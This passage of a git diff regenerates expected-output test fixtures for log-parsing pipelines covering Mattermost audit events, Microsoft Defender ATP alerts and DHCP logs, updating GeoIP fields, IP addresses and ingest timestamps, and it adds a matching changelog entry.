Z\",\"event\":\"patchUser\",\"status\":\"success\",\"user_id\":\"cuk45yubk3nq8g7udrhojbk8ty\",\"session_id\":\"6s4sy7p1b3fqdc3fktsh4yznhr\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/users/me/patch\",\"patch\":{\"id\":\"cuk45yubk3nq8g7udrhojbk8ty\",\"name\":\"other1\",\"roles\":\"system_user system_admin\"},\"user\":{\"id\":\"cuk45yubk3nq8g7udrhojbk8ty\",\"name\":\"other\",\"roles\":\"system_user system_admin\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "patchUser", "category": [ @@ -2440,6 +2514,10 @@ "id": "cuk45yubk3nq8g7udrhojbk8ty" } }, + "url": { + "path": "/api/v4/users/me/patch", + "original": "/api/v4/users/me/patch" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -2452,9 +2530,25 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T01:13:26.358Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y", + "cuk45yubk3nq8g7udrhojbk8ty" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { @@ -2478,46 +2572,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch", - "original": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T01:13:26.358Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y", - "cuk45yubk3nq8g7udrhojbk8ty" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209647234Z", - "original": "{\"timestamp\":\"2021-12-05 01:13:26.358 Z\",\"event\":\"addTeamMembers\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"f57d8pkf7iyg8xo6ttq73ggcnr\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch\",\"count\":1,\"errors\":\"[]\",\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"user_ids\":\"[cuk45yubk3nq8g7udrhojbk8ty]\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543315678Z", + "original": "{\"timestamp\":\"2021-12-05 01:13:26.358 Z\",\"event\":\"addTeamMembers\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"f57d8pkf7iyg8xo6ttq73ggcnr\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch\",\"count\":1,\"errors\":\"[]\",\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"user_ids\":\"[cuk45yubk3nq8g7udrhojbk8ty]\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "addTeamMembers", "category": [ @@ -2541,6 +2618,10 @@ } } }, + "url": { + "path": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch", + "original": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -2553,9 +2634,25 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T01:13:08.904Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y", + "cuk45yubk3nq8g7udrhojbk8ty" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { @@ -2584,46 +2681,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch", - "original": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T01:13:08.904Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y", - "cuk45yubk3nq8g7udrhojbk8ty" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209652346Z", - "original": "{\"timestamp\":\"2021-12-05 01:13:08.904 Z\",\"event\":\"addTeamMembers\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"f57d8pkf7iyg8xo6ttq73ggcnr\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch\",\"count\":1,\"errors\":\"[cuk45yubk3nq8g7udrhojbk8ty:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. Contact your System Administrator for additional details., ]\",\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"user_ids\":\"[cuk45yubk3nq8g7udrhojbk8ty]\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543317073Z", + "original": "{\"timestamp\":\"2021-12-05 01:13:08.904 Z\",\"event\":\"addTeamMembers\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"f57d8pkf7iyg8xo6ttq73ggcnr\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch\",\"count\":1,\"errors\":\"[cuk45yubk3nq8g7udrhojbk8ty:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. Contact your System Administrator for additional details., ]\",\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"user_ids\":\"[cuk45yubk3nq8g7udrhojbk8ty]\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "addTeamMembers", "category": [ @@ -2647,6 +2727,10 @@ } } }, + "url": { + "path": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch", + "original": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -2659,9 +2743,26 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { + "@timestamp": "2021-12-05T01:20:06.246Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y", + "cuk45yubk3nq8g7udrhojbk8ty", + "z63ehbxy47fwpc8bmz9ouuh7fe" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { @@ -2691,47 +2792,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch", - "original": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T01:20:06.246Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y", - "cuk45yubk3nq8g7udrhojbk8ty", - "z63ehbxy47fwpc8bmz9ouuh7fe" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209658600Z", - "original": "{\"timestamp\":\"2021-12-05 01:20:06.246 Z\",\"event\":\"addTeamMembers\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"f57d8pkf7iyg8xo6ttq73ggcnr\",\"ip_address\":\"55.33.6.7\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch\",\"count\":2,\"errors\":\"[cuk45yubk3nq8g7udrhojbk8ty:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. Contact your System Administrator for additional details., z63ehbxy47fwpc8bmz9ouuh7fe:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. Contact your System Administrator for additional details., ]\",\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"user_ids\":\"[cuk45yubk3nq8g7udrhojbk8ty z63ehbxy47fwpc8bmz9ouuh7fe]\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543318483Z", + "original": "{\"timestamp\":\"2021-12-05 01:20:06.246 Z\",\"event\":\"addTeamMembers\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"f57d8pkf7iyg8xo6ttq73ggcnr\",\"ip_address\":\"89.160.20.156\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch\",\"count\":2,\"errors\":\"[cuk45yubk3nq8g7udrhojbk8ty:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. Contact your System Administrator for additional details., z63ehbxy47fwpc8bmz9ouuh7fe:JoinUserToTeam: The user cannot be added as the domain associated with the account is not permitted. Contact your System Administrator for additional details., ]\",\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"user_ids\":\"[cuk45yubk3nq8g7udrhojbk8ty z63ehbxy47fwpc8bmz9ouuh7fe]\",\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "addTeamMembers", "category": [ @@ -2756,6 +2839,10 @@ } } }, + "url": { + "path": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch", + "original": "/api/v4/teams/knrndtys13rzzk48ugm7mssnke/members/batch" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -2768,7 +2855,10 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "mattermost": { @@ -2816,7 +2906,7 @@ ] }, "event": { - "ingested": "2021-12-08T15:26:55.209664049Z", + "ingested": "2021-12-15T08:59:12.543319861Z", "original": "{\"timestamp\":\"2021-12-05 17:21:36.724 Z\",\"event\":\"deleteTeam\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"5timirrr5785mb3q1wutb5unrr\",\"ip_address\":\"127.0.0.1\",\"api_path\":\"/api/v4/teams/knrndtys13rzzk48ugm7mssnke\",\"team\":{\"id\":\"knrndtys13rzzk48ugm7mssnke\",\"name\":\"test\",\"type\":\"O\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"mmctl/5.31.0 (linux)\"}", "kind": "event", "action": "deleteTeam", @@ -2848,6 +2938,19 @@ } }, { + "@timestamp": "2021-12-05T17:24:33.077Z", + "ecs": { + "version": "1.12" + }, + "related": { + "user": [ + "ag99yu4i1if63jrui63tsmq57y", + "z63ehbxy47fwpc8bmz9ouuh7fe" + ], + "ip": [ + "89.160.20.156" + ] + }, "mattermost": { "audit": { "cluster": { @@ -2861,46 +2964,29 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "SE-E", + "city_name": "Linköping", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Östergötland County", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 15.6167, + "lat": 58.4167 + } }, "as": { - "number": 721, + "number": 29518, "organization": { - "name": "DoD Network Information Center" + "name": "Bredband2 AB" } }, - "address": "55.33.6.7", - "ip": "55.33.6.7" - }, - "url": { - "path": "/api/v4/users/z63ehbxy47fwpc8bmz9ouuh7fe/active", - "original": "/api/v4/users/z63ehbxy47fwpc8bmz9ouuh7fe/active" - }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2021-12-05T17:24:33.077Z", - "ecs": { - "version": "1.12" - }, - "related": { - "user": [ - "ag99yu4i1if63jrui63tsmq57y", - "z63ehbxy47fwpc8bmz9ouuh7fe" - ], - "ip": [ - "55.33.6.7" - ] + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-08T15:26:55.209669419Z", - "original": "{\"timestamp\":\"2021-12-05 17:24:33.077 Z\",\"event\":\"updateUserActive\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"jnqqnh3onjympe4u8pa5mgtexw\",\"ip_address\":\"55.33.6.7\",\"active\":false,\"api_path\":\"/api/v4/users/z63ehbxy47fwpc8bmz9ouuh7fe/active\",\"user\":{\"id\":\"z63ehbxy47fwpc8bmz9ouuh7fe\",\"name\":\"other2\",\"roles\":\"system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", + "ingested": "2021-12-15T08:59:12.543321234Z", + "original": "{\"timestamp\":\"2021-12-05 17:24:33.077 Z\",\"event\":\"updateUserActive\",\"status\":\"success\",\"user_id\":\"ag99yu4i1if63jrui63tsmq57y\",\"session_id\":\"jnqqnh3onjympe4u8pa5mgtexw\",\"ip_address\":\"89.160.20.156\",\"active\":false,\"api_path\":\"/api/v4/users/z63ehbxy47fwpc8bmz9ouuh7fe/active\",\"user\":{\"id\":\"z63ehbxy47fwpc8bmz9ouuh7fe\",\"name\":\"other2\",\"roles\":\"system_user\"},\"cluster_id\":\"jq3utry71f8a7q9qgebmjccf4r\",\"client\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36\"}", "kind": "event", "action": "updateUserActive", "category": [ @@ -2923,6 +3009,10 @@ "id": "z63ehbxy47fwpc8bmz9ouuh7fe" } }, + "url": { + "path": "/api/v4/users/z63ehbxy47fwpc8bmz9ouuh7fe/active", + "original": "/api/v4/users/z63ehbxy47fwpc8bmz9ouuh7fe/active" + }, "user_agent": { "name": "Chrome", "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", @@ -2935,7 +3025,10 @@ "name": "Other" }, "version": "96.0.4664.45" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/microsoft/changelog.yml b/packages/microsoft/changelog.yml index e148fe8e1e2..c37727bca60 100644 --- a/packages/microsoft/changelog.yml +++ b/packages/microsoft/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.1.0" changes: - description: Add deprecation message in readme. diff --git a/packages/microsoft/data_stream/defender_atp/_dev/test/pipeline/test-defenderatp.log-expected.json b/packages/microsoft/data_stream/defender_atp/_dev/test/pipeline/test-defenderatp.log-expected.json index fbb2eec4780..6123c789979 100644 --- a/packages/microsoft/data_stream/defender_atp/_dev/test/pipeline/test-defenderatp.log-expected.json +++ b/packages/microsoft/data_stream/defender_atp/_dev/test/pipeline/test-defenderatp.log-expected.json @@ -69,7 +69,7 @@ "end" ], "duration": 0, - "ingested": "2021-06-09T11:57:25.803509100Z", + "ingested": "2021-12-14T14:48:13.578834551Z", "provider": "defender_atp", "action": "Malware", "end": "2020-06-30T10:07:44.333733Z", @@ -172,7 +172,7 @@ "start" ], "duration": 2442699369800, - "ingested": "2021-06-09T11:57:25.803531Z", + "ingested": "2021-12-14T14:48:13.578838209Z", "provider": "defender_atp", "action": "DefenseEvasion", "end": "2020-06-30T09:45:39.5484377Z", @@ -262,7 +262,7 @@ "start" ], "duration": 2442699369800, - "ingested": "2021-06-09T11:57:25.803537900Z", + "ingested": "2021-12-14T14:48:13.578838693Z", "provider": "defender_atp", "action": "DefenseEvasion", "end": "2020-06-30T09:45:39.5484377Z", @@ -353,7 +353,7 @@ "end" ], "duration": 892514711800, - "ingested": "2021-06-09T11:57:25.803543400Z", + "ingested": "2021-12-14T14:48:13.578839087Z", "provider": "defender_atp", "action": "Malware", "end": "2020-06-30T09:46:15.0876676Z", diff --git a/packages/microsoft/data_stream/dhcp/_dev/test/pipeline/test-generated.log-expected.json b/packages/microsoft/data_stream/dhcp/_dev/test/pipeline/test-generated.log-expected.json index 7f4e3206a9a..0c19729b67c 100644 --- a/packages/microsoft/data_stream/dhcp/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/microsoft/data_stream/dhcp/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-905-50: 50,1/29/16,6:09:59,nnumqua,10.133.8.128,sse3269.invalid,01:00:5e:ce:bf:42,ventore,ivelitse,ritin,uredolor,tatemac", "event": { - "ingested": "2021-06-09T11:57:25.990557Z" + "ingested": "2021-12-14T14:48:14.226920579Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4257-11030: 11030,2/12/16,1:12:33,oremi,10.124.22.221,ciade5699.domain,umq,ntium,psaq,cer", "event": { - "ingested": "2021-06-09T11:57:25.990575Z" + "ingested": "2021-12-14T14:48:14.226923210Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5634-62: 62,2/26/16,8:15:08,equepor,10.196.153.12,sequa6540.www5.localhost,01:00:5e:3a:fe:e3,mest", "event": { - "ingested": "2021-06-09T11:57:25.990580900Z" + "ingested": "2021-12-14T14:48:14.226923711Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-363-11015: 11015,3/12/16,3:17:42,nci,10.103.162.55,orev6153.internal.domain,deF,sist,nnumqu,iatnu", "event": { - "ingested": "2021-06-09T11:57:25.990585100Z" + "ingested": "2021-12-14T14:48:14.226924100Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4880-57: 57,3/26/16,10:20:16,quipexe,10.162.33.193,agn2581.www5.corp,01:00:5e:ad:16:77,", "event": { - "ingested": "2021-06-09T11:57:25.990589100Z" + "ingested": "2021-12-14T14:48:14.226924471Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6962-57: 57,4/9/16,5:22:51,moenimi,10.156.15.206,enatus2114.mail.home,01:00:5e:33:84:66", "event": { - "ingested": "2021-06-09T11:57:25.990594900Z" + "ingested": "2021-12-14T14:48:14.226924834Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5355-60: 60,4/24/16,12:25:25,ntex,10.1.118.72,proident2802.home,01:00:5e:69:9a:1a,eumiu", "event": { - "ingested": "2021-06-09T11:57:25.990599100Z" + "ingested": "2021-12-14T14:48:14.226925210Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-7417-15: 15,5/8/16,7:27:59,orisn,10.70.235.184,ofdeF7240.www.home,01:00:5e:a2:09:ea,tionulam,uameius,ratio,ptas,nevolu", "event": { - "ingested": "2021-06-09T11:57:25.990602900Z" + "ingested": "2021-12-14T14:48:14.226925565Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5162-59: 59,5/22/16,2:30:33,nci,10.86.118.154,amco5712.www5.localdomain,01:00:5e:35:c0:09,con,uia,quiavo,issusci,mol,taspe,mvolu,radip,tNequ,gelit,tatno", "event": { - "ingested": "2021-06-09T11:57:25.990606700Z" + "ingested": "2021-12-14T14:48:14.226925925Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4141-10: 10,6/5/16,9:33:08,uam,10.5.62.63,llu4762.mail.localdomain,01:00:5e:f5:8e:0d", "event": { - "ingested": "2021-06-09T11:57:25.990610400Z" + "ingested": "2021-12-14T14:48:14.226926983Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5408-15: 15,6/20/16,4:35:42,llumd,10.66.3.197,emaper2638.lan,01:00:5e:0b:42:ab,uaerat,boreet,onev,tenima,laboreet", "event": { - "ingested": "2021-06-09T11:57:25.990613900Z" + "ingested": "2021-12-14T14:48:14.226927361Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5738-11008: 11008,7/4/16,11:38:16,ccaecat,10.58.0.245,uatDuis2964.test,veri,rsita,siutaliq,exercit", "event": { - "ingested": "2021-06-09T11:57:25.990617800Z" + "ingested": "2021-12-14T14:48:14.226927843Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4243-25: 25,7/18/16,6:40:50,antium,10.103.246.190,iusmodt2597.api.domain,01:00:5e:8b:ba:06,ect,reetdolo,nrepreh,obeataev,lor", "event": { - "ingested": "2021-06-09T11:57:25.990621300Z" + "ingested": "2021-12-14T14:48:14.226928233Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-1579-11011: 11011,8/2/16,1:43:25,natura,10.163.217.10,untNequ5075.www5.domain,erep,iutal,dexe,urerep", "event": { - "ingested": "2021-06-09T11:57:25.990625200Z" + "ingested": "2021-12-14T14:48:14.226928585Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-3971-56: 56,8/16/16,8:45:59,lorem,10.150.193.226,uidolore6237.internal.local,01:00:5e:42:6c:b4,suntinc,elits,llam,llamcorp,ari,eataevit,uptatev,uovol,dmi,olab,mquisnos", "event": { - "ingested": "2021-06-09T11:57:25.990628700Z" + "ingested": "2021-12-14T14:48:14.226928945Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-2933-17: 17,8/30/16,3:48:33,tsed,10.111.61.181,incididu1896.example,01:00:5e:c9:5b:b2,", "event": { - "ingested": "2021-06-09T11:57:25.990632400Z" + "ingested": "2021-12-14T14:48:14.226929298Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5393-11003: 11003,9/13/16,10:51:07,temsequ,10.111.27.193,idexea3181.www.local,tvol,moll,tatione,inB", "event": { - "ingested": "2021-06-09T11:57:25.990636Z" + "ingested": "2021-12-14T14:48:14.226929762Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4171-16: 16,9/28/16,5:53:42,ntsuntin,10.153.112.62,imav3236.mail.domain,01:00:5e:e7:c7:cb", "event": { - "ingested": "2021-06-09T11:57:25.990639600Z" + "ingested": "2021-12-14T14:48:14.226930121Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-7290-32: 32,10/12/16,12:56:16,iam,10.98.34.185,ercit3947.api.local,01:00:5e:a4:f5:60,olupta,turveli,toccae,tatno,nido", "event": { - "ingested": "2021-06-09T11:57:25.990643300Z" + "ingested": "2021-12-14T14:48:14.226930520Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4125-53: 53,10/26/16,7:58:50,itlabori,10.252.112.103,usan6343.www5.domain,01:00:5e:10:76:60,ender", "event": { - "ingested": "2021-06-09T11:57:25.990646700Z" + "ingested": "2021-12-14T14:48:14.226930872Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5368-50: 50,11/10/16,3:01:24,atquovo,10.246.117.190,mquaera3924.www5.home,01:00:5e:b9:7e:b1", "event": { - "ingested": "2021-06-09T11:57:25.990650200Z" + "ingested": "2021-12-14T14:48:14.226931236Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-4173-33: 33,11/24/16,10:03:59,undeo,10.82.52.233,atuse2703.localhost,01:00:5e:fa:2b:37", "event": { - "ingested": "2021-06-09T11:57:25.990653700Z" + "ingested": "2021-12-14T14:48:14.226931598Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-5883-52: 52,12/8/16,5:06:33,ips,10.149.59.28,emporinc5075.internal.host,01:00:5e:37:14:9d,tessec", "event": { - "ingested": "2021-06-09T11:57:25.990657200Z" + "ingested": "2021-12-14T14:48:14.226931956Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%MSDHCP-6446-36: 36,12/23/16,12:09:07,ist,10.169.144.147,onsequat2984.www5.domain,01:00:5e:59:a3:48,", "event": { - "ingested": "2021-06-09T11:57:25.990661Z" + "ingested": "2021-12-14T14:48:14.226932421Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" 